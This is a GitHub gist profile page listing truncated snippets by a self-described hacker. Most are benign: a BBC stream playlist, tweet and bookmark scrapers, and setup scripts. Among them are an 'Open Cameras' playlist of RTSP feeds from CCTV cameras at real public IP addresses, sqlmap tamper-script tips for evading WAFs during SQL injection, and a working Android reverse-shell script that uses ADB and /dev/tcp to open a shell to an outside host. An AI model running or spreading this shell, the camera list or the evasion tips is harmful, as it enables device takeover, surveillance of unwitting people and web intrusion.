Skip to content

Instantly share code, notes, and snippets.

View random-robbie's full-sized avatar
💭
Hacking!

Robbie random-robbie

💭
Hacking!
View GitHub Profile
@random-robbie
random-robbie / BBC.m3u
Last active June 16, 2026 23:38
BBC HLS Streams - let me know if i missed any
#EXTM3U
#EXTINF:-1 tvg-id="BBC One HD" tvg-name="BBC One HD" tvg-logo="https://s4.postimg.org/k5xl5dmf1/bbc_one.png" group-title="BBC",BBC One HD
http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/abr_hdtv/ak/bbc_one_hd.m3u8
#EXTINF:-1 tvg-id="BBC One London" tvg-name="BBC One London" tvg-logo="https://s4.postimg.org/z61nj8qd9/Bbc_london_logo.jpg" group-title="BBC",BBC One London
http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/hls_tablet/ak/bbc_one_london.m3u8
#EXTINF:-1 tvg-id="BBC One Northern Ireland HD" tvg-name="BBC One Northern Ireland HD" tvg-logo="https://s3.postimg.org/ltztuojqr/6y_QROLCn_400x400.png" group-title="BBC",BBC One Northern Ireland HD
http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/abr_hdtv/ak/bbc_one_northern_ireland_hd.m3u8
#EXTINF:-1 tvg-id="BBC One Scotland HD" tvg-name="BBC One Scotland HD" tvg-logo="https://s3.postimg.org/ltztuojqr/6y_QROLCn_400x400.png" group-title="BBC",BBC One Scotland HD
http://a.fi
@random-robbie
random-robbie / cams.m3u
Created November 23, 2017 15:43
Open Cameras
#M3U
#EXTINF:-0, CCTV - 93.185.113.36 - Italy
rtsp://93.185.113.36/live/ch00_0
#EXTINF:-0, CCTV - 213.37.135.235 - Spain
rtsp://213.37.135.235/live/ch00_0
#EXTINF:-0, CCTV - 88.26.221.17 - Spain
rtsp://88.26.221.17/live/ch00_0
#EXTINF:-0, CCTV - 195.46.114.161 - Russian Federation
rtsp://195.46.114.161/live/ch00_0
#EXTINF:-0, CCTV - 195.211.232.90 - Russian Federation
@random-robbie
random-robbie / tweets.js
Created April 7, 2026 13:25
extra a users tweets visit their profile and copy it in to console
(async () => {
const delay = ms => new Promise(r => setTimeout(r, ms));
const tweets = new Map();
const extract = () => {
document.querySelectorAll('article[data-testid="tweet"]').forEach(el => {
const textEl = el.querySelector('[data-testid="tweetText"]');
const timeEl = el.querySelector('time');
const likeEl = el.querySelector('[data-testid="like"] span[data-testid="app-text-transition-container"]');
const retweetEl = el.querySelector('[data-testid="retweet"] span[data-testid="app-text-transition-container"]');
@random-robbie
random-robbie / bookmarks.js
Created April 5, 2026 09:38
Extra 30 days of bookmarks from yout twitter account to csv just copy in to console and press enter
(async () => {
const cutoff = new Date(Date.now() - 30 * 24 * 60 * 60 * 1000);
const seen = new Map();
const sleep = ms => new Promise(r => setTimeout(r, ms));
function collectFromPage() {
const articles = [...document.querySelectorAll('article')];
for (const article of articles) {
const timeEl = article.querySelector('time');
@random-robbie
random-robbie / sqlmap.md
Created February 10, 2026 21:18
best tamper scripts for mysql for sqlmap

Essential MySQL Tamper Scripts

Most Effective General Purpose:

--tamper=between,randomcase,space2comment

  • between - Replaces > with NOT BETWEEN 0 AND # and = with BETWEEN # AND #
  • randomcase - Randomizes case of keywords (bypass case-sensitive filters)
  • space2comment - Replaces spaces with /**/ comments

For WAF/Filter Bypass:

#!/bin/bash
export DEBIAN_FRONTEND=noninteractive;
echo "[*] Starting Install... [*]"
echo "[*] Upgrade installed packages to latest [*]"
echo -e "\nRunning a package upgrade...\n"
apt-get -qq update && apt-get -qq dist-upgrade -y
apt full-upgrade -y
apt-get autoclean
echo "[*] Install stuff I use all the time [*]"
*.bamgrid.com
*.bamtech.co
*.brightcove.net
*.dazn.com
*.dazn.link
*.daznbet.com
*.daznbet.de
*.dazndn.com
*.dazngroup.com
*.discomax.com
@random-robbie
random-robbie / android-shell.sh
Last active December 8, 2025 10:27
Android Reverse Shell
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
@random-robbie
random-robbie / DutchGov.txt
Last active November 6, 2025 18:47
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
http://www.rijksoverheid.nl
http://www.rivm.nl
http://coronadashboard.rijksoverheid.nl
http://www.nederlandwereldwijd.nl
http://www.government.nl
http://lci.rivm.nl
http://www.rvo.nl
http://www.defensie.nl
http://www.werkenvoornederland.nl
http://www.rijkswaterstaat.nl
#!/bin/bash
# Update Homebrew
brew update
# Install Python 3.11 if not already installed
brew install python@3.11
# Create a virtual environment
python3.11 -m venv openweb-ui-env